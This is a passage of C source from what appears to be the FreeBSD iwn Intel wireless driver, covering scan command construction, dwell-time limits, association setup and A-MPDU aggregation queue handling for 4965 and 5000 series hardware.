(IWN_ACTIVE_DWELL_TIME_5GHZ + IWN_ACTIVE_DWELL_FACTOR_5GHZ * (n_probes + 1)); } /* * Limit the total dwell time to 85% of the beacon interval. * * Returns the dwell time in milliseconds. */ static uint16_t iwn_limit_dwell(struct iwn_softc *sc, uint16_t dwell_time) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = NULL; int bintval = 0; /* bintval is in TU (1.024mS) */ if (! TAILQ_EMPTY(&ic->ic_vaps)) { vap = TAILQ_FIRST(&ic->ic_vaps); bintval = vap->iv_bss->ni_intval; } /* * If it's non-zero, we should calculate the minimum of * it and the DWELL_BASE. * * XXX Yes, the math should take into account that bintval * is 1.024mS, not 1mS.. */ if (bintval > 0) { DPRINTF(sc, IWN_DEBUG_SCAN, "%s: bintval=%d\n", __func__, bintval); return (MIN(IWN_PASSIVE_DWELL_BASE, ((bintval * 85) / 100))); } /* No association context? Default */ return (IWN_PASSIVE_DWELL_BASE); } static uint16_t iwn_get_passive_dwell_time(struct iwn_softc *sc, struct ieee80211_channel *c) { uint16_t passive; if (c == NULL || IEEE80211_IS_CHAN_2GHZ(c)) { passive = IWN_PASSIVE_DWELL_BASE + IWN_PASSIVE_DWELL_TIME_2GHZ; } else { passive = IWN_PASSIVE_DWELL_BASE + IWN_PASSIVE_DWELL_TIME_5GHZ; } /* Clamp to the beacon interval if we're associated */ return (iwn_limit_dwell(sc, passive)); } static int iwn_scan(struct iwn_softc *sc, struct ieee80211vap *vap, struct ieee80211_scan_state *ss, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_node *ni = vap->iv_bss; struct iwn_scan_hdr *hdr; struct iwn_cmd_data *tx; struct iwn_scan_essid *essid; struct iwn_scan_chan *chan; struct ieee80211_frame *wh; struct ieee80211_rateset *rs; uint8_t *buf, *frm; uint16_t rxchain; uint8_t txant; int buflen, error; int is_active; uint16_t dwell_active, dwell_passive; uint32_t extra, scan_service_time; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* * We are absolutely not allowed to send a scan command when another * scan command is pending. 
*/ if (sc->sc_is_scanning) { device_printf(sc->sc_dev, "%s: called whilst scanning!\n", __func__); return (EAGAIN); } /* Assign the scan channel */ c = ic->ic_curchan; sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; buf = malloc(IWN_SCAN_MAXSZ, M_DEVBUF, M_NOWAIT | M_ZERO); if (buf == NULL) { device_printf(sc->sc_dev, "%s: could not allocate buffer for scan command\n", __func__); return ENOMEM; } hdr = (struct iwn_scan_hdr *)buf; /* * Move to the next channel if no frames are received within 10ms * after sending the probe request. */ hdr->quiet_time = htole16(10); /* timeout in milliseconds */ hdr->quiet_threshold = htole16(1); /* min # of packets */ /* * Max needs to be greater than active and passive and quiet! * It's also in microseconds! */ hdr->max_svc = htole32(250 * 1024); /* * Reset scan: interval=100 * Normal scan: interval=becaon interval * suspend_time: 100 (TU) * */ extra = (100 /* suspend_time */ / 100 /* beacon interval */) << 22; //scan_service_time = extra | ((100 /* susp */ % 100 /* int */) * 1024); scan_service_time = (4 << 22) | (100 * 1024); /* Hardcode for now! */ hdr->pause_svc = htole32(scan_service_time); /* Select antennas for scanning. */ rxchain = IWN_RXCHAIN_VALID(sc->rxchainmask) | IWN_RXCHAIN_FORCE_MIMO_SEL(sc->rxchainmask) | IWN_RXCHAIN_DRIVER_FORCE; if (IEEE80211_IS_CHAN_A(c) && sc->hw_type == IWN_HW_REV_TYPE_4965) { /* Ant A must be avoided in 5GHz because of an HW bug. */ rxchain |= IWN_RXCHAIN_FORCE_SEL(IWN_ANT_B); } else /* Use all available RX antennas. */ rxchain |= IWN_RXCHAIN_FORCE_SEL(sc->rxchainmask); hdr->rxchain = htole16(rxchain); hdr->filter = htole32(IWN_FILTER_MULTICAST | IWN_FILTER_BEACON); tx = (struct iwn_cmd_data *)(hdr + 1); tx->flags = htole32(IWN_TX_AUTO_SEQ); tx->id = sc->broadcast_id; tx->lifetime = htole32(IWN_LIFETIME_INFINITE); if (IEEE80211_IS_CHAN_5GHZ(c)) { /* Send probe requests at 6Mbps. */ tx->rate = htole32(0xd); rs = &ic->ic_sup_rates[IEEE80211_MODE_11A]; } else { hdr->flags = htole32(IWN_RXON_24GHZ | IWN_RXON_AUTO); if (sc->hw_type == IWN_HW_REV_TYPE_4965 && sc->rxon->associd && sc->rxon->chan > 14) tx->rate = htole32(0xd); else { /* Send probe requests at 1Mbps. */ tx->rate = htole32(10 | IWN_RFLAG_CCK); } rs = &ic->ic_sup_rates[IEEE80211_MODE_11G]; } /* Use the first valid TX antenna. */ txant = IWN_LSB(sc->txchainmask); tx->rate |= htole32(IWN_RFLAG_ANT(txant)); /* * Only do active scanning if we're announcing a probe request * for a given SSID (or more, if we ever add it to the driver.) */ is_active = 0; /* * If we're scanning for a specific SSID, add it to the command. * * XXX maybe look at adding support for scanning multiple SSIDs? */ essid = (struct iwn_scan_essid *)(tx + 1); if (ss != NULL) { if (ss->ss_ssid[0].len != 0) { essid[0].id = IEEE80211_ELEMID_SSID; essid[0].len = ss->ss_ssid[0].len; memcpy(essid[0].data, ss->ss_ssid[0].ssid, ss->ss_ssid[0].len); } DPRINTF(sc, IWN_DEBUG_SCAN, "%s: ssid_len=%d, ssid=%*s\n", __func__, ss->ss_ssid[0].len, ss->ss_ssid[0].len, ss->ss_ssid[0].ssid); if (ss->ss_nssid > 0) is_active = 1; } /* * Build a probe request frame. Most of the following code is a * copy & paste of what is done in net80211. 
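 * For orientation, the scan command buffer being assembled here is laid
 * out as: struct iwn_scan_hdr, then struct iwn_cmd_data (tx), then 20
 * struct iwn_scan_essid slots (only the first of which may have been
 * filled in above), then this probe request template, and finally one
 * struct iwn_scan_chan entry; the (essid + 20) arithmetic below simply
 * skips over all 20 SSID slots.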
*/ wh = (struct ieee80211_frame *)(essid + 20); wh->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_REQ; wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; IEEE80211_ADDR_COPY(wh->i_addr1, ifp->if_broadcastaddr); IEEE80211_ADDR_COPY(wh->i_addr2, IF_LLADDR(ifp)); IEEE80211_ADDR_COPY(wh->i_addr3, ifp->if_broadcastaddr); *(uint16_t *)&wh->i_dur[0] = 0; /* filled by HW */ *(uint16_t *)&wh->i_seq[0] = 0; /* filled by HW */ frm = (uint8_t *)(wh + 1); frm = ieee80211_add_ssid(frm, NULL, 0); frm = ieee80211_add_rates(frm, rs); if (rs->rs_nrates > IEEE80211_RATE_SIZE) frm = ieee80211_add_xrates(frm, rs); if (ic->ic_htcaps & IEEE80211_HTC_HT) frm = ieee80211_add_htcap(frm, ni); /* Set length of probe request. */ tx->len = htole16(frm - (uint8_t *)wh); /* * If active scanning is requested but a certain channel is * marked passive, we can do active scanning if we detect * transmissions. * * There is an issue with some firmware versions that triggers * a sysassert on a "good CRC threshold" of zero (== disabled), * on a radar channel even though this means that we should NOT * send probes. * * The "good CRC threshold" is the number of frames that we * need to receive during our dwell time on a channel before * sending out probes -- setting this to a huge value will * mean we never reach it, but at the same time work around * the aforementioned issue. Thus use IWL_GOOD_CRC_TH_NEVER * here instead of IWL_GOOD_CRC_TH_DISABLED. * * This was fixed in later versions along with some other * scan changes, and the threshold behaves as a flag in those * versions. */ /* * If we're doing active scanning, set the crc_threshold * to a suitable value. This is different to active veruss * passive scanning depending upon the channel flags; the * firmware will obey that particular check for us. */ if (sc->tlv_feature_flags & IWN_UCODE_TLV_FLAGS_NEWSCAN) hdr->crc_threshold = is_active ? IWN_GOOD_CRC_TH_DEFAULT : IWN_GOOD_CRC_TH_DISABLED; else hdr->crc_threshold = is_active ? IWN_GOOD_CRC_TH_DEFAULT : IWN_GOOD_CRC_TH_NEVER; chan = (struct iwn_scan_chan *)frm; chan->chan = htole16(ieee80211_chan2ieee(ic, c)); chan->flags = 0; if (ss->ss_nssid > 0) chan->flags |= htole32(IWN_CHAN_NPBREQS(1)); chan->dsp_gain = 0x6e; /* * Set the passive/active flag depending upon the channel mode. * XXX TODO: take the is_active flag into account as well? */ if (c->ic_flags & IEEE80211_CHAN_PASSIVE) chan->flags |= htole32(IWN_CHAN_PASSIVE); else chan->flags |= htole32(IWN_CHAN_ACTIVE); /* * Calculate the active/passive dwell times. 
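 * Example with assumed constants (the real values live in the register
 * header, not here): if the 2 GHz active base were 30 ms with a 3 ms
 * per-probe factor, a scan carrying one SSID (n_probes = 1) would get
 * an active dwell of 30 + 3 * (1 + 1) = 36 ms; the passive dwell is its
 * base plus a band-specific offset, clamped to 85% of the beacon
 * interval when associated, and is then forced to at least
 * dwell_active + 1 below.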
*/ dwell_active = iwn_get_active_dwell_time(sc, c, ss->ss_nssid); dwell_passive = iwn_get_passive_dwell_time(sc, c); /* Make sure they're valid */ if (dwell_passive <= dwell_active) dwell_passive = dwell_active + 1; chan->active = htole16(dwell_active); chan->passive = htole16(dwell_passive); if (IEEE80211_IS_CHAN_5GHZ(c) && !(c->ic_flags & IEEE80211_CHAN_PASSIVE)) { chan->rf_gain = 0x3b; } else if (IEEE80211_IS_CHAN_5GHZ(c)) { chan->rf_gain = 0x3b; } else if (!(c->ic_flags & IEEE80211_CHAN_PASSIVE)) { chan->rf_gain = 0x28; } else { chan->rf_gain = 0x28; } DPRINTF(sc, IWN_DEBUG_STATE, "%s: chan %u flags 0x%x rf_gain 0x%x " "dsp_gain 0x%x active %d passive %d scan_svc_time %d crc 0x%x " "isactive=%d numssid=%d\n", __func__, chan->chan, chan->flags, chan->rf_gain, chan->dsp_gain, dwell_active, dwell_passive, scan_service_time, hdr->crc_threshold, is_active, ss->ss_nssid); hdr->nchan++; chan++; buflen = (uint8_t *)chan - buf; hdr->len = htole16(buflen); if (sc->sc_is_scanning) { device_printf(sc->sc_dev, "%s: called with is_scanning set!\n", __func__); } sc->sc_is_scanning = 1; DPRINTF(sc, IWN_DEBUG_STATE, "sending scan command nchan=%d\n", hdr->nchan); error = iwn_cmd(sc, IWN_CMD_SCAN, buf, buflen, 1); free(buf, M_DEVBUF); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return error; } static int iwn_auth(struct iwn_softc *sc, struct ieee80211vap *vap) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_node *ni = vap->iv_bss; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; /* Update adapter configuration. */ IEEE80211_ADDR_COPY(sc->rxon->bssid, ni->ni_bssid); sc->rxon->chan = ieee80211_chan2ieee(ic, ni->ni_chan); sc->rxon->flags = htole32(IWN_RXON_TSF | IWN_RXON_CTS_TO_SELF); if (IEEE80211_IS_CHAN_2GHZ(ni->ni_chan)) sc->rxon->flags |= htole32(IWN_RXON_AUTO | IWN_RXON_24GHZ); if (ic->ic_flags & IEEE80211_F_SHSLOT) sc->rxon->flags |= htole32(IWN_RXON_SHSLOT); if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) sc->rxon->flags |= htole32(IWN_RXON_SHPREAMBLE); if (IEEE80211_IS_CHAN_A(ni->ni_chan)) { sc->rxon->cck_mask = 0; sc->rxon->ofdm_mask = 0x15; } else if (IEEE80211_IS_CHAN_B(ni->ni_chan)) { sc->rxon->cck_mask = 0x03; sc->rxon->ofdm_mask = 0; } else { /* Assume 802.11b/g. */ sc->rxon->cck_mask = 0x03; sc->rxon->ofdm_mask = 0x15; } DPRINTF(sc, IWN_DEBUG_STATE, "rxon chan %d flags %x cck %x ofdm %x\n", sc->rxon->chan, sc->rxon->flags, sc->rxon->cck_mask, sc->rxon->ofdm_mask); if (sc->sc_is_scanning) device_printf(sc->sc_dev, "%s: is_scanning set, before RXON\n", __func__); error = iwn_cmd(sc, IWN_CMD_RXON, sc->rxon, sc->rxonsz, 1); if (error != 0) { device_printf(sc->sc_dev, "%s: RXON command failed, error %d\n", __func__, error); return error; } /* Configuration has changed, set TX power accordingly. */ if ((error = ops->set_txpower(sc, ni->ni_chan, 1)) != 0) { device_printf(sc->sc_dev, "%s: could not set TX power, error %d\n", __func__, error); return error; } /* * Reconfiguring RXON clears the firmware nodes table so we must * add the broadcast node again. 
*/ if ((error = iwn_add_broadcast_node(sc, 1)) != 0) { device_printf(sc->sc_dev, "%s: could not add broadcast node, error %d\n", __func__, error); return error; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; } static int iwn_run(struct iwn_softc *sc, struct ieee80211vap *vap) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_node *ni = vap->iv_bss; struct iwn_node_info node; uint32_t htflags = 0; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; if (ic->ic_opmode == IEEE80211_M_MONITOR) { /* Link LED blinks while monitoring. */ iwn_set_led(sc, IWN_LED_LINK, 5, 5); return 0; } if ((error = iwn_set_timing(sc, ni)) != 0) { device_printf(sc->sc_dev, "%s: could not set timing, error %d\n", __func__, error); return error; } /* Update adapter configuration. */ IEEE80211_ADDR_COPY(sc->rxon->bssid, ni->ni_bssid); sc->rxon->associd = htole16(IEEE80211_AID(ni->ni_associd)); sc->rxon->chan = ieee80211_chan2ieee(ic, ni->ni_chan); sc->rxon->flags = htole32(IWN_RXON_TSF | IWN_RXON_CTS_TO_SELF); if (IEEE80211_IS_CHAN_2GHZ(ni->ni_chan)) sc->rxon->flags |= htole32(IWN_RXON_AUTO | IWN_RXON_24GHZ); if (ic->ic_flags & IEEE80211_F_SHSLOT) sc->rxon->flags |= htole32(IWN_RXON_SHSLOT); if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) sc->rxon->flags |= htole32(IWN_RXON_SHPREAMBLE); if (IEEE80211_IS_CHAN_A(ni->ni_chan)) { sc->rxon->cck_mask = 0; sc->rxon->ofdm_mask = 0x15; } else if (IEEE80211_IS_CHAN_B(ni->ni_chan)) { sc->rxon->cck_mask = 0x03; sc->rxon->ofdm_mask = 0; } else { /* Assume 802.11b/g. */ sc->rxon->cck_mask = 0x0f; sc->rxon->ofdm_mask = 0x15; } if (IEEE80211_IS_CHAN_HT(ni->ni_chan)) { htflags |= IWN_RXON_HT_PROTMODE(ic->ic_curhtprotmode); if (IEEE80211_IS_CHAN_HT40(ni->ni_chan)) { switch (ic->ic_curhtprotmode) { case IEEE80211_HTINFO_OPMODE_HT20PR: htflags |= IWN_RXON_HT_MODEPURE40; break; default: htflags |= IWN_RXON_HT_MODEMIXED; break; } } if (IEEE80211_IS_CHAN_HT40D(ni->ni_chan)) htflags |= IWN_RXON_HT_HT40MINUS; } sc->rxon->flags |= htole32(htflags); sc->rxon->filter |= htole32(IWN_FILTER_BSS); DPRINTF(sc, IWN_DEBUG_STATE, "rxon chan %d flags %x\n", sc->rxon->chan, sc->rxon->flags); if (sc->sc_is_scanning) device_printf(sc->sc_dev, "%s: is_scanning set, before RXON\n", __func__); error = iwn_cmd(sc, IWN_CMD_RXON, sc->rxon, sc->rxonsz, 1); if (error != 0) { device_printf(sc->sc_dev, "%s: could not update configuration, error %d\n", __func__, error); return error; } /* Configuration has changed, set TX power accordingly. */ if ((error = ops->set_txpower(sc, ni->ni_chan, 1)) != 0) { device_printf(sc->sc_dev, "%s: could not set TX power, error %d\n", __func__, error); return error; } /* Fake a join to initialize the TX rate. */ ((struct iwn_node *)ni)->id = IWN_ID_BSS; iwn_newassoc(ni, 1); /* Add BSS node. 
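 * The A-MPDU parameters passed below map to the usual 802.11n encoding:
 * a size factor of 3 corresponds to a maximum A-MPDU length of
 * 2^(13 + 3) - 1 = 65535 bytes, and a density code of 5 to a 4 usec
 * minimum MPDU start spacing (hence the "4us" note).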
*/ memset(&node, 0, sizeof node); IEEE80211_ADDR_COPY(node.macaddr, ni->ni_macaddr); node.id = IWN_ID_BSS; if (IEEE80211_IS_CHAN_HT(ni->ni_chan)) { switch (ni->ni_htcap & IEEE80211_HTCAP_SMPS) { case IEEE80211_HTCAP_SMPS_ENA: node.htflags |= htole32(IWN_SMPS_MIMO_DIS); break; case IEEE80211_HTCAP_SMPS_DYNAMIC: node.htflags |= htole32(IWN_SMPS_MIMO_PROT); break; } node.htflags |= htole32(IWN_AMDPU_SIZE_FACTOR(3) | IWN_AMDPU_DENSITY(5)); /* 4us */ if (IEEE80211_IS_CHAN_HT40(ni->ni_chan)) node.htflags |= htole32(IWN_NODE_HT40); } DPRINTF(sc, IWN_DEBUG_STATE, "%s: adding BSS node\n", __func__); error = ops->add_node(sc, &node, 1); if (error != 0) { device_printf(sc->sc_dev, "%s: could not add BSS node, error %d\n", __func__, error); return error; } DPRINTF(sc, IWN_DEBUG_STATE, "%s: setting link quality for node %d\n", __func__, node.id); if ((error = iwn_set_link_quality(sc, ni)) != 0) { device_printf(sc->sc_dev, "%s: could not setup link quality for node %d, error %d\n", __func__, node.id, error); return error; } if ((error = iwn_init_sensitivity(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not set sensitivity, error %d\n", __func__, error); return error; } /* Start periodic calibration timer. */ sc->calib.state = IWN_CALIB_STATE_ASSOC; sc->calib_cnt = 0; callout_reset(&sc->calib_to, msecs_to_ticks(500), iwn_calib_timeout, sc); /* Link LED always on while associated. */ iwn_set_led(sc, IWN_LED_LINK, 0, 1); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; } /* * This function is called by upper layer when an ADDBA request is received * from another STA and before the ADDBA response is sent. */ static int iwn_ampdu_rx_start(struct ieee80211_node *ni, struct ieee80211_rx_ampdu *rap, int baparamset, int batimeout, int baseqctl) { #define MS(_v, _f) (((_v) & _f) >> _f##_S) struct iwn_softc *sc = ni->ni_ic->ic_ifp->if_softc; struct iwn_ops *ops = &sc->ops; struct iwn_node *wn = (void *)ni; struct iwn_node_info node; uint16_t ssn; uint8_t tid; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); tid = MS(le16toh(baparamset), IEEE80211_BAPS_TID); ssn = MS(le16toh(baseqctl), IEEE80211_BASEQ_START); memset(&node, 0, sizeof node); node.id = wn->id; node.control = IWN_NODE_UPDATE; node.flags = IWN_FLAG_SET_ADDBA; node.addba_tid = tid; node.addba_ssn = htole16(ssn); DPRINTF(sc, IWN_DEBUG_RECV, "ADDBA RA=%d TID=%d SSN=%d\n", wn->id, tid, ssn); error = ops->add_node(sc, &node, 1); if (error != 0) return error; return sc->sc_ampdu_rx_start(ni, rap, baparamset, batimeout, baseqctl); #undef MS } /* * This function is called by upper layer on teardown of an HT-immediate * Block Ack agreement (eg. uppon receipt of a DELBA frame). 
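 * net80211 does not hand us the TID here, so the function below
 * recovers it by matching the rap pointer against ni->ni_rx_ampdu[]
 * (see the XXX note) before telling the firmware to tear the
 * aggregation state down with IWN_FLAG_SET_DELBA.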
*/ static void iwn_ampdu_rx_stop(struct ieee80211_node *ni, struct ieee80211_rx_ampdu *rap) { struct ieee80211com *ic = ni->ni_ic; struct iwn_softc *sc = ic->ic_ifp->if_softc; struct iwn_ops *ops = &sc->ops; struct iwn_node *wn = (void *)ni; struct iwn_node_info node; uint8_t tid; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* XXX: tid as an argument */ for (tid = 0; tid < WME_NUM_TID; tid++) { if (&ni->ni_rx_ampdu[tid] == rap) break; } memset(&node, 0, sizeof node); node.id = wn->id; node.control = IWN_NODE_UPDATE; node.flags = IWN_FLAG_SET_DELBA; node.delba_tid = tid; DPRINTF(sc, IWN_DEBUG_RECV, "DELBA RA=%d TID=%d\n", wn->id, tid); (void)ops->add_node(sc, &node, 1); sc->sc_ampdu_rx_stop(ni, rap); } static int iwn_addba_request(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int dialogtoken, int baparamset, int batimeout) { struct iwn_softc *sc = ni->ni_ic->ic_ifp->if_softc; int qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); for (qid = sc->firstaggqueue; qid < sc->ntxqs; qid++) { if (sc->qid2tap[qid] == NULL) break; } if (qid == sc->ntxqs) { DPRINTF(sc, IWN_DEBUG_XMIT, "%s: not free aggregation queue\n", __func__); return 0; } tap->txa_private = malloc(sizeof(int), M_DEVBUF, M_NOWAIT); if (tap->txa_private == NULL) { device_printf(sc->sc_dev, "%s: failed to alloc TX aggregation structure\n", __func__); return 0; } sc->qid2tap[qid] = tap; *(int *)tap->txa_private = qid; return sc->sc_addba_request(ni, tap, dialogtoken, baparamset, batimeout); } static int iwn_addba_response(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int code, int baparamset, int batimeout) { struct iwn_softc *sc = ni->ni_ic->ic_ifp->if_softc; int qid = *(int *)tap->txa_private; uint8_t tid = tap->txa_tid; int ret; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); if (code == IEEE80211_STATUS_SUCCESS) { ni->ni_txseqs[tid] = tap->txa_start & 0xfff; ret = iwn_ampdu_tx_start(ni->ni_ic, ni, tid); if (ret != 1) return ret; } else { sc->qid2tap[qid] = NULL; free(tap->txa_private, M_DEVBUF); tap->txa_private = NULL; } return sc->sc_addba_response(ni, tap, code, baparamset, batimeout); } /* * This function is called by upper layer when an ADDBA response is received * from another STA. */ static int iwn_ampdu_tx_start(struct ieee80211com *ic, struct ieee80211_node *ni, uint8_t tid) { struct ieee80211_tx_ampdu *tap = &ni->ni_tx_ampdu[tid]; struct iwn_softc *sc = ni->ni_ic->ic_ifp->if_softc; struct iwn_ops *ops = &sc->ops; struct iwn_node *wn = (void *)ni; struct iwn_node_info node; int error, qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Enable TX for the specified RA/TID. 
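 * disable_tid is kept as a per-station bitmap of TIDs the firmware must
 * not transmit on; clearing bit "tid" here (e.g. clearing 0x0010 for
 * TID 4) and pushing the updated mask with IWN_FLAG_SET_DISABLE_TID
 * re-enables transmission on that TID before aggregation is started.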
*/ wn->disable_tid &= ~(1 << tid); memset(&node, 0, sizeof node); node.id = wn->id; node.control = IWN_NODE_UPDATE; node.flags = IWN_FLAG_SET_DISABLE_TID; node.disable_tid = htole16(wn->disable_tid); error = ops->add_node(sc, &node, 1); if (error != 0) return 0; if ((error = iwn_nic_lock(sc)) != 0) return 0; qid = *(int *)tap->txa_private; DPRINTF(sc, IWN_DEBUG_XMIT, "%s: ra=%d tid=%d ssn=%d qid=%d\n", __func__, wn->id, tid, tap->txa_start, qid); ops->ampdu_tx_start(sc, ni, qid, tid, tap->txa_start & 0xfff); iwn_nic_unlock(sc); iwn_set_link_quality(sc, ni); return 1; } static void iwn_ampdu_tx_stop(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap) { struct iwn_softc *sc = ni->ni_ic->ic_ifp->if_softc; struct iwn_ops *ops = &sc->ops; uint8_t tid = tap->txa_tid; int qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); sc->sc_addba_stop(ni, tap); if (tap->txa_private == NULL) return; qid = *(int *)tap->txa_private; if (sc->txq[qid].queued != 0) return; if (iwn_nic_lock(sc) != 0) return; ops->ampdu_tx_stop(sc, qid, tid, tap->txa_start & 0xfff); iwn_nic_unlock(sc); sc->qid2tap[qid] = NULL; free(tap->txa_private, M_DEVBUF); tap->txa_private = NULL; } static void iwn4965_ampdu_tx_start(struct iwn_softc *sc, struct ieee80211_node *ni, int qid, uint8_t tid, uint16_t ssn) { struct iwn_node *wn = (void *)ni; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Stop TX scheduler while we're changing its configuration. */ iwn_prph_write(sc, IWN4965_SCHED_QUEUE_STATUS(qid), IWN4965_TXQ_STATUS_CHGACT); /* Assign RA/TID translation to the queue. */ iwn_mem_write_2(sc, sc->sched_base + IWN4965_SCHED_TRANS_TBL(qid), wn->id << 4 | tid); /* Enable chain-building mode for the queue. */ iwn_prph_setbits(sc, IWN4965_SCHED_QCHAIN_SEL, 1 << qid); /* Set starting sequence number from the ADDBA request. */ sc->txq[qid].cur = sc->txq[qid].read = (ssn & 0xff); IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | (ssn & 0xff)); iwn_prph_write(sc, IWN4965_SCHED_QUEUE_RDPTR(qid), ssn); /* Set scheduler window size. */ iwn_mem_write(sc, sc->sched_base + IWN4965_SCHED_QUEUE_OFFSET(qid), IWN_SCHED_WINSZ); /* Set scheduler frame limit. */ iwn_mem_write(sc, sc->sched_base + IWN4965_SCHED_QUEUE_OFFSET(qid) + 4, IWN_SCHED_LIMIT << 16); /* Enable interrupts for the queue. */ iwn_prph_setbits(sc, IWN4965_SCHED_INTR_MASK, 1 << qid); /* Mark the queue as active. */ iwn_prph_write(sc, IWN4965_SCHED_QUEUE_STATUS(qid), IWN4965_TXQ_STATUS_ACTIVE | IWN4965_TXQ_STATUS_AGGR_ENA | iwn_tid2fifo[tid] << 1); } static void iwn4965_ampdu_tx_stop(struct iwn_softc *sc, int qid, uint8_t tid, uint16_t ssn) { DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Stop TX scheduler while we're changing its configuration. */ iwn_prph_write(sc, IWN4965_SCHED_QUEUE_STATUS(qid), IWN4965_TXQ_STATUS_CHGACT); /* Set starting sequence number from the ADDBA request. */ IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | (ssn & 0xff)); iwn_prph_write(sc, IWN4965_SCHED_QUEUE_RDPTR(qid), ssn); /* Disable interrupts for the queue. */ iwn_prph_clrbits(sc, IWN4965_SCHED_INTR_MASK, 1 << qid); /* Mark the queue as inactive. */ iwn_prph_write(sc, IWN4965_SCHED_QUEUE_STATUS(qid), IWN4965_TXQ_STATUS_INACTIVE | iwn_tid2fifo[tid] << 1); } static void iwn5000_ampdu_tx_start(struct iwn_softc *sc, struct ieee80211_node *ni, int qid, uint8_t tid, uint16_t ssn) { DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); struct iwn_node *wn = (void *)ni; /* Stop TX scheduler while we're changing its configuration. 
*/ iwn_prph_write(sc, IWN5000_SCHED_QUEUE_STATUS(qid), IWN5000_TXQ_STATUS_CHGACT); /* Assign RA/TID translation to the queue. */ iwn_mem_write_2(sc, sc->sched_base + IWN5000_SCHED_TRANS_TBL(qid), wn->id << 4 | tid); /* Enable chain-building mode for the queue. */ iwn_prph_setbits(sc, IWN5000_SCHED_QCHAIN_SEL, 1 << qid); /* Enable aggregation for the queue. */ iwn_prph_setbits(sc, IWN5000_SCHED_AGGR_SEL, 1 << qid); /* Set starting sequence number from the ADDBA request. */ sc->txq[qid].cur = sc->txq[qid].read = (ssn & 0xff); IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | (ssn & 0xff)); iwn_prph_write(sc, IWN5000_SCHED_QUEUE_RDPTR(qid), ssn); /* Set scheduler window size and frame limit. */ iwn_mem_write(sc, sc->sched_base + IWN5000_SCHED_QUEUE_OFFSET(qid) + 4, IWN_SCHED_LIMIT << 16 | IWN_SCHED_WINSZ); /* Enable interrupts for the queue. */ iwn_prph_setbits(sc, IWN5000_SCHED_INTR_MASK, 1 << qid); /* Mark the queue as active. */ iwn_prph_write(sc, IWN5000_SCHED_QUEUE_STATUS(qid), IWN5000_TXQ_STATUS_ACTIVE | iwn_tid2fifo[tid]); } static void iwn5000_ampdu_tx_stop(struct iwn_softc *sc, int qid, uint8_t tid, uint16_t ssn) { DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Stop TX scheduler while we're changing its configuration. */ iwn_prph_write(sc, IWN5000_SCHED_QUEUE_STATUS(qid), IWN5000_TXQ_STATUS_CHGACT); /* Disable aggregation for the queue. */ iwn_prph_clrbits(sc, IWN5000_SCHED_AGGR_SEL, 1 << qid); /* Set starting sequence number from the ADDBA request. */ IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | (ssn & 0xff)); iwn_prph_write(sc, IWN5000_SCHED_QUEUE_RDPTR(qid), ssn); /* Disable interrupts for the queue. */ iwn_prph_clrbits(sc, IWN5000_SCHED_INTR_MASK, 1 << qid); /* Mark the queue as inactive. */ iwn_prph_write(sc, IWN5000_SCHED_QUEUE_STATUS(qid), IWN5000_TXQ_STATUS_INACTIVE | iwn_tid2fifo[tid]); } /* * Query calibration tables from the initialization firmware. We do this * only once at first boot. Called from a process context. */ static int iwn5000_query_calibration(struct iwn_softc *sc) { struct iwn5000_calib_config cmd; int error; memset(&cmd, 0, sizeof cmd); cmd.ucode.once.enable = htole32(0xffffffff); cmd.ucode.once.start = htole32(0xffffffff); cmd.ucode.once.send = htole32(0xffffffff); cmd.ucode.flags = htole32(0xffffffff); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: sending calibration query\n", __func__); error = iwn_cmd(sc, IWN5000_CMD_CALIB_CONFIG, &cmd, sizeof cmd, 0); if (error != 0) return error; /* Wait at most two seconds for calibration to complete. */ if (!(sc->sc_flags & IWN_FLAG_CALIB_DONE)) error = msleep(sc, &sc->sc_mtx, PCATCH, "iwncal", 2 * hz); return error; } /* * Send calibration results to the runtime firmware. These results were * obtained on first boot from the initialization firmware. 
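 * Each stored result is replayed with an IWN_CMD_PHY_CALIB command; entries
 * that are not flagged in base_params->calib_need, or for which no data was
 * captured, are skipped.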
 */
static int
